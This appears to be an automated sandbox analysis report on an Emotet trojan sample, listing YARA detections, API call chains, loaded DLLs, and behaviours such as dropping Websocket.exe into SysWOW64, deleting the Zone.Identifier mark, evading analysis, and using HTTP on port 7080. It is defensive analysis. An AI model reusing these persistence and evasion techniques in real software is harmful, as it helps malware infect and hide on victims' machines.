              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_006063F00_2_006063F0
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F9C6E0_2_005F9C6E
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F380E0_2_005F380E
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F90CE0_2_005F90CE
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F98FE0_2_005F98FE
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F7F8E0_2_005F7F8E
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006180D02_2_006180D0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00611C702_2_00611C70
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00617D602_2_00617D60
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006175302_2_00617530
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006163F02_2_006163F0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00609C6E2_2_00609C6E
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_0060380E2_2_0060380E
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006098FE2_2_006098FE
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006090CE2_2_006090CE
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00607F8E2_2_00607F8E
              Source: ExeFile (356).exeStatic PE information: Resource name: DAGHHHHHTY type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Source: ExeFile (356).exe, 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameVfWWDM32.DLLj% vs ExeFile (356).exe
              Source: ExeFile (356).exeBinary or memory string: OriginalFilenameVfWWDM32.DLLj% vs ExeFile (356).exe
              Source: ExeFile (356).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.evad.winEXE@4/0@0/97
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_0040E170 GetLastError,FormatMessageW,_wprintf,0_2_0040E170
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_0040E220 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040E220
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_0040E220 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040E220
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: CreateServiceW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,0_2_00608660
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_0040F510 GetUserNameW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,wsprintfW,_memset,OpenProcess,CloseHandle,wsprintfW,wsprintfW,Process32NextW,CloseHandle,0_2_0040F510
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00604F50 ChangeServiceConfig2W,GetProcessHeap,HeapFree,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,GetTickCount,GetProcessHeap,HeapFree,RtlFreeHeap,0_2_00604F50
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: win32app0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: Run0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: win32app0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: win32app0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: Edit0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: Cancel0_2_0040FA80
              Source: C:\Users\user\Desktop\ExeFile (356).exeCommand line argument: BUTTON0_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: win32app2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: Run2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: win32app2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: BUTTON2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: BUTTON2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: BUTTON2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: win32app2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: Edit2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: BUTTON2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: Cancel2_2_0040FA80
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCommand line argument: BUTTON2_2_0040FA80
              Source: ExeFile (356).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\ExeFile (356).exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ExeFile (356).exeReversingLabs: Detection: 97%
              Source: unknownProcess created: C:\Users\user\Desktop\ExeFile (356).exe "C:\Users\user\Desktop\ExeFile (356).exe"
              Source: C:\Users\user\Desktop\ExeFile (356).exeProcess created: C:\Windows\SysWOW64\provcore\Websocket.exe "C:\Windows\SysWOW64\provcore\Websocket.exe"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
              Source: C:\Users\user\Desktop\ExeFile (356).exeProcess created: C:\Windows\SysWOW64\provcore\Websocket.exe "C:\Windows\SysWOW64\provcore\Websocket.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: ExeFile (356).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: A:\WindowsProcessManager-master\WindowsProcessManager-master\Release\TaskMgr.pdb source: ExeFile (356).exe
              Source: Binary string: vfwwdm32.pdb source: ExeFile (356).exe
              Source: ExeFile (356).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: ExeFile (356).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: ExeFile (356).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: ExeFile (356).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: ExeFile (356).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00415F77 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00415F77
              Source: ExeFile (356).exeStatic PE information: real checksum: 0x744f8 should be: 0x6d651
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00411EC5 push ecx; ret 0_2_00411ED8
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605C50 push ecx; mov dword ptr [esp], 00008F8Eh0_2_00605C51
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605CF0 push ecx; mov dword ptr [esp], 00000E88h0_2_00605CF1
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605CD0 push ecx; mov dword ptr [esp], 0000A465h0_2_00605CD1
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605C90 push ecx; mov dword ptr [esp], 00002224h0_2_00605C91
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605D70 push ecx; mov dword ptr [esp], 0000B4A4h0_2_00605D71
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605D20 push ecx; mov dword ptr [esp], 0000C239h0_2_00605D21
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605DE0 push ecx; mov dword ptr [esp], 0000272Ah0_2_00605DE1
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605DB0 push ecx; mov dword ptr [esp], 00001190h0_2_00605DB1
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605E40 push ecx; mov dword ptr [esp], 0000C126h0_2_00605E41
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605EE0 push ecx; mov dword ptr [esp], 00006DE4h0_2_00605EE1
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_00605EA0 push ecx; mov dword ptr [esp], 00008285h0_2_00605EA1
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F7A7E push ecx; mov dword ptr [esp], 00006DE4h0_2_005F7A7F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F786E push ecx; mov dword ptr [esp], 0000A465h0_2_005F786F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005FE015 push 0000003Bh; ret 0_2_005FE01A
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F7A3E push ecx; mov dword ptr [esp], 00008285h0_2_005F7A3F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F782E push ecx; mov dword ptr [esp], 00002224h0_2_005F782F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F788E push ecx; mov dword ptr [esp], 00000E88h0_2_005F788F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F78BE push ecx; mov dword ptr [esp], 0000C239h0_2_005F78BF
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F794E push ecx; mov dword ptr [esp], 00001190h0_2_005F794F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F797E push ecx; mov dword ptr [esp], 0000272Ah0_2_005F797F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F790E push ecx; mov dword ptr [esp], 0000B4A4h0_2_005F790F
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F79DE push ecx; mov dword ptr [esp], 0000C126h0_2_005F79DF
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_005F77EE push ecx; mov dword ptr [esp], 00008F8Eh0_2_005F77EF
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00411EC5 push ecx; ret 2_2_00411ED8
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00615C50 push ecx; mov dword ptr [esp], 00008F8Eh2_2_00615C51
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00615CF0 push ecx; mov dword ptr [esp], 00000E88h2_2_00615CF1
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00615CD0 push ecx; mov dword ptr [esp], 0000A465h2_2_00615CD1
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00615C90 push ecx; mov dword ptr [esp], 00002224h2_2_00615C91
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00615D70 push ecx; mov dword ptr [esp], 0000B4A4h2_2_00615D71
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_00615D20 push ecx; mov dword ptr [esp], 0000C239h2_2_00615D21

              Persistence and Installation Behavior

              barindex
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Users\user\Desktop\ExeFile (356).exeExecutable created and started: C:\Windows\SysWOW64\provcore\Websocket.exeJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exePE file moved: C:\Windows\SysWOW64\provcore\Websocket.exeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\ExeFile (356).exeFile opened: C:\Windows\SysWOW64\provcore\Websocket.exe:Zone.Identifier read attributes | deleteJump to behavior
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 62409 -> 7080

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Users\user\Desktop\ExeFile (356).exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-24129
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\ExeFile (356).exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (356).exeCode function: 0_2_006038B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,0_2_006038B0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeCode function: 2_2_006138B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,2_2_006138B0
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2550427830.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\ExeFile (356).exeAPI call chain: ExitProcess graph end nodegraph_0-24393
              Source: C:\Users\user\Desktop\ExeFile (356).exeAPI call chain: ExitProcess graph end nodegraph_0-24264
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeAPI call chain: ExitProcess graph end nodegraph_2-24049
              Source: C:\Windows\SysWOW64\provcore\Websocket.exeAPI call chain: ExitProcess graph end nodegraph_2-24119
